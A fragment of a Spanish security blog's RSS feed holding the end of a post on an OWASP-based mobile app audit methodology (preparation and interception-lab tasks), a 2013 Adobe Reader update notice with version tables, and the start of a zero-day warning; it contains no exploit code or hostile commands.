&lt;li style="border: 0px; font-style: inherit; list-style: square outside; margin: 0px 2.9em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px; text-align: start;"&gt;E1.A3&lt;/b&gt;&lt;span style="border: 0px; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;"&gt;:&amp;nbsp;&lt;/span&gt;&lt;u style="margin: 0px; padding: 0px; text-align: start;"&gt;Análisis&amp;nbsp;de las funcionalidades y/o&amp;nbsp;características&amp;nbsp;de la aplicación&lt;/u&gt;&lt;/li&gt;
&lt;li style="border: 0px; font-style: inherit; list-style: square outside; margin: 0px 2.9em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px; text-align: start;"&gt;E1.A4&lt;/b&gt;&lt;span style="border: 0px; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;"&gt;:&amp;nbsp;&lt;/span&gt;&lt;u style="margin: 0px; padding: 0px; text-align: start;"&gt;Análisis&amp;nbsp;de la arquitectura software de la aplicación&lt;/u&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
A continuación se detallan las tareas que cada una de las Actividades aquí planteadas deberían de aplicar.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #cfe2f3; font-size: large;"&gt;&lt;b&gt;E1.A1&lt;/b&gt;:&amp;nbsp;&lt;u&gt;Requisitos y/o&amp;nbsp;características&amp;nbsp;necesarias para la Auditoria&lt;/u&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;E1.A1.T1&lt;/b&gt;&amp;nbsp;Identificar el sistema operativo y plataforma de desarrollo (SDK) de la aplicación a auditar.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;E1.A1.T2&lt;/b&gt;&amp;nbsp;Identificar la necesidad de la aplicación de utilizar un dispositivo con acceso "root" o en su defecto "jailbroken" (IOS desbloqueado).&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;E1.A1.T3&lt;/b&gt;&amp;nbsp;Registrar y/o configurar una cuenta de usuario destinada para las pruebas de auditoria, con objeto de disponer al menos de dos cuentas de usuario. (Ideal para realizar las pruebas de elevación de privilegios).&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;E1.A1.T4&lt;/b&gt;&amp;nbsp;Implementar una infraestructura / laboratorio para la realización de la auditoria / pruebas que permita la interceptación y registro de las comunicaciones de red (Man in the Middle), con soporte para realizar un bypass de los certificados de las conexiones seguras (HTTPS).&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #cfe2f3; font-size: large;"&gt;&lt;b&gt;E1.A2&lt;/b&gt;:&amp;nbsp;&lt;u&gt;Análisis&amp;nbsp;de los requisitos de Comunicación&lt;/u&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;E1.A2.T1&lt;/b&gt;&amp;nbsp;Registro (sniffing and logging) de todas las conexiones / comunicaciones de la aplicación, bien realizadas sobre el dispositivo móvil físicamente o en laboratorio de pruebas (simulador / emulador).&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;E1.A2.T2&lt;/b&gt;&amp;nbsp;Identificación de las interfaces de comunicación utilizada por la aplicación móvil: NFC, Bluetooth, Wifi, 3G/4G, VPN, etc&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;E1.A2.T3&lt;/b&gt;&amp;nbsp;Identificación de requisitos&amp;nbsp;específicos&amp;nbsp;en las comunicaciones de la aplicación para el correcto funcionamiento. Ejemplo: es necesario tener activada la WiFi para funcionar o es suficiente con tener conexión 3G/4G.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;E1.A2.T4&lt;/b&gt;&amp;nbsp;Listado de los protocolos de comunicación utilizados. Identificar la necesidad y correcta utilización de los mismos. Ejemplo: Se utiliza HTTPS para transmitir datos seguros cuando es necesario, o en caso de necesidad (firewall) puede establecerse la comunicación sin cifrado (HTTP) en lugar de HTTPS, ¿es esto posible? anotar toda la información descubierta.&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;span style="background-color: #cfe2f3;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;E1.A3&lt;/b&gt;:&amp;nbsp;&lt;u&gt;Análisis&amp;nbsp;de las funcionalidades y/o&amp;nbsp;características&amp;nbsp;de la aplicación&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;E1.A3.T1&lt;/b&gt;&amp;nbsp;Utilización manual de la aplicación con el fin de establecer el flujo de trabajo, así como entender el funcionamiento básico de la aplicación. Esta tarea puede ser llevada a cabo sobre la ejecución de la aplicación en un terminal físico o en un emulador / simulador.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;E1.A3.T2&lt;/b&gt;&amp;nbsp;Identificar las interacciones de la aplicación con otras aplicaciones, servicios o acceso a datos tales como:&amp;nbsp;&lt;/li&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;Acceso datos de contacto.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Acceso a información del telefono (registro de llamadas, SMS, etc).&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Utilización de la aplicación Google Wallet (tarjeta monedero).&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Servicios de almacenamiento en la nube (dropbox, box, drive, skydrive, icloud, etc).&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Integración con redes sociales (facebook, twitter, tuenti, flickr, instangram, google+, etc).&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Otras aplicaciones: Correo&amp;nbsp;electrónico, block de notas, etc.&lt;/li&gt;
&lt;/ul&gt;
&lt;/ul&gt;
&lt;span style="background-color: #cfe2f3; font-size: large;"&gt;&lt;b&gt;E1.A4&lt;/b&gt;:&amp;nbsp;&lt;u&gt;Análisis&amp;nbsp;de la arquitectura software de la aplicación&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;E1.A4.T1&lt;/b&gt;&amp;nbsp;Realizar una&amp;nbsp;búsqueda (motores de búsquedas, foros, repositorios de código fuente, etc)&amp;nbsp;exhaustiva sobre la aplicación en Internet, con objeto de recopilar toda la información posible sobre su arquitectura interna. Ejemplo: código / librerías (API) de 3rd utilizados y/o integrados dentro de la aplicación.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;E1.A4.T2&lt;/b&gt;&amp;nbsp;Identificación y recopilación de información sobre el entorno de ejecución de la aplicación en el lado del servidor (si éxiste). Ejemplo:&lt;/li&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;Hosting&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Entorno de desarrollo (Rails, ASP.NET, Java, Django, etc)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Sistema de autenticación (Single Sign On o API)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;API / Librerías (Adsense, Cloud, Cifrado, etc)&lt;/li&gt;
&lt;/ul&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;E1.A4.T3&lt;/b&gt;&amp;nbsp;Identificación y listado (primera impresión), en función de la información recopilada, de&amp;nbsp;los posibles (potenciales) puntos de&amp;nbsp;interés&amp;nbsp;de la aplicación desde el punto de vista de la seguridad. Ejemplo: debilidad en la credenciales, errores, información cacheada, etc.&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: justify;"&gt;
En la &lt;b&gt;siguiente entrega continuaremos&lt;/b&gt; con la descripción de la segunda etapa de la metodología, la correspondiente al&amp;nbsp;&lt;b&gt;Análisis&amp;nbsp;Estático&lt;/b&gt;&amp;nbsp;de la aplicación móvil, en dicha fase es donde se realiza la revisión y/o&amp;nbsp;&lt;b&gt;auditoria&amp;nbsp;del código fuente&lt;/b&gt; principalmente.&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Referencias:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[1] &lt;a href="https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing_Guide" target="_blank"&gt;OWASP Mobile Security Project - Security Testing Guide&lt;/a&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=jqKOzqFnsac:YBQhcdqfuL8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=jqKOzqFnsac:YBQhcdqfuL8:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=jqKOzqFnsac:YBQhcdqfuL8:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=jqKOzqFnsac:YBQhcdqfuL8:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=jqKOzqFnsac:YBQhcdqfuL8:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=jqKOzqFnsac:YBQhcdqfuL8:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=jqKOzqFnsac:YBQhcdqfuL8:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=jqKOzqFnsac:YBQhcdqfuL8:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=jqKOzqFnsac:YBQhcdqfuL8:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=jqKOzqFnsac:YBQhcdqfuL8:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/jqKOzqFnsac" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/jqKOzqFnsac/OWASP-Parte2MetodologiaAppMobile.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-Accpccysxfw/UWKpX648iYI/AAAAAAAAEP8/JA3VR9nrct0/s72-c/OWASP_Part2.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/02/OWASP-Parte2MetodologiaAppMobile.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-6792625871835509345</guid><pubDate>Sat, 23 Feb 2013 10:20:00 +0000</pubDate><atom:updated>2013-02-23T11:20:15.600+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">PDF</category><category domain="http://www.blogger.com/atom/ns#">Actualidad</category><category domain="http://www.blogger.com/atom/ns#">Adobe</category><category domain="http://www.blogger.com/atom/ns#">Software</category><category domain="http://www.blogger.com/atom/ns#">Vulnerabilidad</category><category domain="http://www.blogger.com/atom/ns#">Update</category><title>[UPDATE] Actualización de Adobe para solucionar sus dos últimos problemas de seguridad</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-jmIv1-ptB1A/UJvtzWcSAXI/AAAAAAAADFM/mpRN3NxtAJE/s1600/PDF_icon2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-jmIv1-ptB1A/UJvtzWcSAXI/AAAAAAAADFM/mpRN3NxtAJE/s1600/PDF_icon2.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;strong style="background-color: white; color: #474747; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px; padding: 0px;"&gt;Adobe&lt;/strong&gt;&lt;span style="background-color: white; color: #474747; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&amp;nbsp;ha solucionado&amp;nbsp;&lt;/span&gt;&lt;strong style="background-color: white; color: #474747; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px; padding: 0px;"&gt;dos nuevas vulnerabilidades&amp;nbsp;&lt;/strong&gt;&lt;span style="background-color: white; color: #474747; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;que afectan a sus programas&amp;nbsp;&lt;/span&gt;&lt;strong style="background-color: white; color: #474747; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px; padding: 0px;"&gt;Adobe Reader y Adobe Acrobat,&lt;/strong&gt;&lt;span style="background-color: white; margin: 0px; padding: 0px;"&gt;&lt;span style="color: #474747; font-family: Arial, Helvetica, sans-serif; font-size: x-small;"&gt;&lt;span style="line-height: 20px;"&gt; tal y como ya os&amp;nbsp;contábamos&amp;nbsp;en nuestro &lt;a href="http://www.seguridadparatodos.es/2013/02/urgente-detectada-una-vulnerabilidad.html" target="_blank"&gt;anterior artículo&lt;/a&gt;, estas estaban siendo&amp;nbsp;ampliamente&amp;nbsp;utilizadas en Internet por los "cibercriminales".&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: white; margin: 0px; padding: 0px;"&gt;&lt;span style="color: #474747; font-family: Arial, Helvetica, sans-serif; font-size: x-small;"&gt;&lt;span style="line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: white; margin: 0px; padding: 0px;"&gt;&lt;span style="color: #474747; font-family: Arial, Helvetica, sans-serif; font-size: x-small;"&gt;&lt;span style="line-height: 20px;"&gt;El 20 de Febrero 2013 Adobe ha lanzado una actualización de emergencia, fuera del ciclo habitual de actualizaciones, para poner remedio a dichas vulnerabilidades.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: white; margin: 0px; padding: 0px;"&gt;&lt;span style="color: #474747; font-family: Arial, Helvetica, sans-serif; font-size: x-small;"&gt;&lt;span style="line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #474747; font-family: Arial, Helvetica, sans-serif; font-size: x-small;"&gt;&lt;span style="line-height: 20px;"&gt;Adobe nos recomienda las siguientes "actualizaciones" por orden de prioridad, verifica cuál es tu caso, y&amp;nbsp;actúa&amp;nbsp;en consecuencia.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #474747; font-family: Arial, Helvetica, sans-serif; font-size: x-small;"&gt;&lt;span style="line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h3 id="Ratings" style="background-color: #eaeaea; border-bottom-color: rgb(203, 203, 203); border-bottom-style: solid; border-bottom-width: 3px; color: #222222; font-family: Arial, Helvetica, sans-serif; font-size: 0.917em; line-height: 1.455; margin: 0px 0px 0.85em; min-height: 1em; padding: 4px 0px; text-align: start; text-transform: uppercase;"&gt;
PRIORITY AND SEVERITY RATINGS&lt;/h3&gt;
&lt;div style="background-color: #eaeaea; color: #333333; font-family: Arial, Helvetica, sans-serif; line-height: 1.462; margin-bottom: 1.2em; padding-bottom: 1px; text-align: start;"&gt;
&lt;span style="font-size: x-small;"&gt;Adobe categorizes these updates with the following&amp;nbsp;&lt;a href="http://www.adobe.com/devnet/security/security_zone/severity_ratings.html" style="color: #627282; text-decoration: none;"&gt;priority ratings&lt;/a&gt;&amp;nbsp;and recommends users update their installations to the newest versions:&lt;/span&gt;&lt;/div&gt;
&lt;table class="max" style="background-color: #eaeaea; color: #333333; font-family: Arial, Helvetica, sans-serif; line-height: 12px; overflow: hidden; text-overflow: ellipsis; width: 726px;"&gt;&lt;thead&gt;
&lt;tr&gt;&lt;th class="txtleft"&gt;&lt;span style="font-size: x-small;"&gt;Product&lt;/span&gt;&lt;/th&gt;&lt;th class="txtleft"&gt;&lt;span style="font-size: x-small;"&gt;Updated version&lt;/span&gt;&lt;/th&gt;&lt;th class="txtleft"&gt;&lt;span style="font-size: x-small;"&gt;Platform&lt;/span&gt;&lt;/th&gt;&lt;th class="txtleft"&gt;&lt;span style="font-size: x-small;"&gt;Priority rating&lt;/span&gt;&lt;/th&gt;&lt;/tr&gt;
&lt;/thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;Adobe Reader&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;XI (11.0.02)&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;Windows and Macintosh&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;X (10.1.6)&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;Windows and Macintosh&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;9.5.4&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;Windows and Macintosh&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;9.5.4&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;Linux&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;2&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;Adobe Acrobat&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;XI (11.0.02)&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;Windows and Macintosh&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;X (10.1.6)&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;Windows and Macintosh&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;9.5.4&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;Windows and Macintosh&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="background-color: #eaeaea; color: #333333; font-family: Arial, Helvetica, sans-serif; line-height: 1.462; margin-bottom: 1.2em; padding-bottom: 1px; text-align: start;"&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;These updates address&amp;nbsp;&lt;a href="http://www.adobe.com/devnet/security/severity_ratings.html" style="color: #627282; text-decoration: none;"&gt;critical&lt;/a&gt;&amp;nbsp;vulnerabilities in the software.&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Actualizaciones&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: #eaeaea; color: #333333; font-family: Arial, Helvetica, sans-serif; line-height: 12px;"&gt;&lt;span style="font-size: x-small;"&gt;Adobe Reader users on Windows can also find the appropriate update here:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="background-color: #eaeaea; color: #333333; font-family: Arial, Helvetica, sans-serif; line-height: 1.462; margin-bottom: 1.2em; padding-bottom: 1px;"&gt;
&lt;a href="http://www.adobe.com/support/downloads/product.jsp?product=10&amp;amp;platform=Windows" style="color: #627282; text-decoration: none;"&gt;&lt;span style="font-size: x-small;"&gt;http://www.adobe.com/support/downloads/product.jsp?product=10&amp;amp;platform=Windows&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="background-color: #eaeaea; color: #333333; font-family: Arial, Helvetica, sans-serif; line-height: 12px;"&gt;&lt;span style="font-size: x-small;"&gt;Adobe Reader users on Macintosh can also find the appropriate update here:&lt;/span&gt;&lt;/span&gt;&lt;div style="background-color: #eaeaea; color: #333333; font-family: Arial, Helvetica, sans-serif; line-height: 1.462; margin-bottom: 1.2em; padding-bottom: 1px;"&gt;
&lt;a href="http://www.adobe.com/support/downloads/product.jsp?product=10&amp;amp;platform=Macintosh" style="color: #627282; text-decoration: none;"&gt;&lt;span style="font-size: x-small;"&gt;http://www.adobe.com/support/downloads/product.jsp?product=10&amp;amp;platform=Macintosh&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: x-small;"&gt;&lt;span style="background-color: #eaeaea; color: #333333; font-family: Arial, Helvetica, sans-serif; line-height: 12px;"&gt;Adobe Reader users on Linux can find the appropriate update here:&amp;nbsp;&lt;/span&gt;&lt;a href="ftp://ftp.adobe.com/pub/adobe/reader/unix/9.x/" style="background-color: #eaeaea; color: #627282; font-family: Arial, Helvetica, sans-serif; line-height: 12px; text-decoration: none;"&gt;ftp://ftp.adobe.com/pub/adobe/reader/unix/9.x/&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vía: &lt;a href="https://www.adobe.com/support/security/bulletins/apsb13-07.html" target="_blank"&gt;Adobe Security Bulletin&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=eGfuV2eXpKY:KHUvYQmWeWo:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=eGfuV2eXpKY:KHUvYQmWeWo:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=eGfuV2eXpKY:KHUvYQmWeWo:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=eGfuV2eXpKY:KHUvYQmWeWo:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=eGfuV2eXpKY:KHUvYQmWeWo:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=eGfuV2eXpKY:KHUvYQmWeWo:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=eGfuV2eXpKY:KHUvYQmWeWo:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=eGfuV2eXpKY:KHUvYQmWeWo:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=eGfuV2eXpKY:KHUvYQmWeWo:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=eGfuV2eXpKY:KHUvYQmWeWo:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/eGfuV2eXpKY" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/eGfuV2eXpKY/update-actualizacion-de-adobe-para.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-jmIv1-ptB1A/UJvtzWcSAXI/AAAAAAAADFM/mpRN3NxtAJE/s72-c/PDF_icon2.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/02/update-actualizacion-de-adobe-para.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-4078627054942910157</guid><pubDate>Thu, 14 Feb 2013 16:02:00 +0000</pubDate><atom:updated>2013-02-14T17:02:23.920+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">zero-day</category><category domain="http://www.blogger.com/atom/ns#">Adobe</category><category domain="http://www.blogger.com/atom/ns#">Noticias</category><category domain="http://www.blogger.com/atom/ns#">Vulnerabilidad</category><category domain="http://www.blogger.com/atom/ns#">Seguridad</category><title>[URGENTE] Detectada una vulnerabilidad crítica en varias versiones de Adobe Reader</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-NcYCSGL8XfA/TuxqSdg7EII/AAAAAAAABp8/sO1yBHvrB-U/s1600/adobe_parche.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="193" src="http://4.bp.blogspot.com/-NcYCSGL8XfA/TuxqSdg7EII/AAAAAAAABp8/sO1yBHvrB-U/s320/adobe_parche.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El popular programa para leer documentos en PDF ha emitido ayer 13 de Febrero 2013 un &lt;a href="https://www.adobe.com/support/security/advisories/apsa13-02.html" target="_blank"&gt;boletín de seguridad&lt;/a&gt; donde alerta de la existencia de una vulnerabilidad crítica en varios de sus productos.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Además &lt;a href="http://thehackernews.com/2013/02/new-adobe-reader-zero-day-vulnerability_13.html" target="_blank"&gt;TheHackersNews&lt;/a&gt; informa que esta vulnerabilidad esta &lt;b&gt;siendo explotada intensamente en Internet&lt;/b&gt;, por lo que se solicita que se extreme la&amp;nbsp;precaución&amp;nbsp;a la hora de abrir PDF recibidos vía correo&amp;nbsp;electrónico&amp;nbsp;o disponibles en páginas WEB.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
